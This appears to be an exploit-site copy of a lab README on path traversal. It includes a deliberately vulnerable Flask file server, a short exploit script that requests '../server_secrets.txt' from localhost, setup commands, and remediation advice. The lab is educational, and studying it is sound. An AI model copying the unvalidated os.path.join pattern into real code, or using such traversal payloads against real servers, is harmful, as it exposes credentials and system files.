## https://sploitus.com/exploit?id=9C0C7C33-F42D-5F71-8C4B-8752A0D5974D
# OS Path Traversal & System File Exfiltration
## ๐ฏ Executive Summary
This laboratory demonstrates **Local File Inclusion (LFI)** through **Path Traversal (CWE-22)**. It showcases how an attacker can leverage unvalidated input to "escape" the web root directory and interact directly with the server's underlying operating system. This is a critical "System-Level" vulnerability that often leads to the exposure of SSH keys, database credentials, and environmental secrets.
---
## ๐๏ธ Technical Architecture
### 1. The Vulnerable Asset (`vulnerable_server.py`)
The server simulates a standard enterprise "Image Vault." The critical flaw lies in the `/view` endpoint which uses `os.path.join` on raw user input without verification.
```python
from flask import Flask, request, send_file
import os
app = Flask(__name__)
# Intended restricted directory
IMAGE_DIR = os.path.join(os.getcwd(), 'public_images')
@app.route('/view')
def view_file():
filename = request.args.get('file')
# FATAL VULNERABILITY: Blindly joining user input
# An attacker can use '../' to escape IMAGE_DIR
file_path = os.path.join(IMAGE_DIR, filename)
try:
return send_file(file_path)
except Exception as e:
return f"Access Denied: {str(e)}"
if __name__ == '__main__':
# Creating a dummy sensitive file outside the web root to simulate a system file
with open('server_secrets.txt', 'w') as f:
f.write("CONFIDENTIAL: DB_PASS=Admin123! | AWS_KEY=AKIA_EXAMPLE_12345")
app.run(port=5054)
```
### 2. The Exploit Engine (traversal_exploit.py)
This script automates the directory breakout. It bypasses the logical restriction by injecting the ../ (dot-dot-slash) pointer, which instructs the OS to move one level up in the directory hierarchy.
```python
import requests
TARGET = "[http://127.0.0.1:5054/view](http://127.0.0.1:5054/view)"
PAYLOAD = "../server_secrets.txt"
def run_exploit():
print(f" [*] Targeting File System with payload: {PAYLOAD}")
response = requests.get(TARGET, params={'file': PAYLOAD})
if response.status_code == 200 and "CONFIDENTIAL" in response.text:
print("\n[!] CRITICAL: Path Traversal Successful!")
print(f" [!] Exfiltrated Data: {response.text}")
else:
print("\n[-] Attack failed. Check if the server is active.")
if __name__ == "__main__":
run_exploit()
```
### ๐ ๏ธ Detailed Execution Guide
Phase 1: Environment Hardening
To prevent library conflicts, use an isolated Python Virtual Environment:
```bash
# 1. Clone the repository
git clone [https://github.com/this-is-the-invincible-meghnad/Path-Traversal-Lab.git](https://github.com/this-is-the-invincible-meghnad/Path-Traversal-Lab.git)
# 2. Enter the project directory
cd Path-Traversal-Lab
# 3. Create a clean virtual environment
python -m venv venv
# 4. Activate the environment
# For Windows:
.\venv\Scripts\activate
# For Mac/Linux:
source venv/bin/activate
# 5. Install the required security testing libraries
pip install flask requests
# 6. Start the Vulnerable Server
# Open a terminal and run:
python vulnerable_server.py
# 7. Execute the Exploit
# Open a second terminal (ensure venv is active) and run:
python traversal_exploit.py
```
### Launching the Lab
Initialize Server: In Terminal A, run python vulnerable_server.py. The server will create a "secret" file in the root directory that it is not supposed to share.
Execute Breach: In Terminal B, run python traversal_exploit.py. You will see the contents of server_secrets.txt printed directly to your console.
๐ก๏ธ Remediation & Architectural Defense
Relying on "hope" is not a security strategy. To reach a Top 1% security standard, implement the following controls:
Input Normalization: Use os.path.basename() on all user-supplied filenames. This strips out all path information, leaving only the filename itself.
Chroot Jails / Containerization: Run the application in a Docker container with a "Read-Only" filesystem for system directories.
The "Allow-list" Pattern: Instead of letting users request any file, use a database ID (e.g., ?id=105) and map it to a filename on the backend.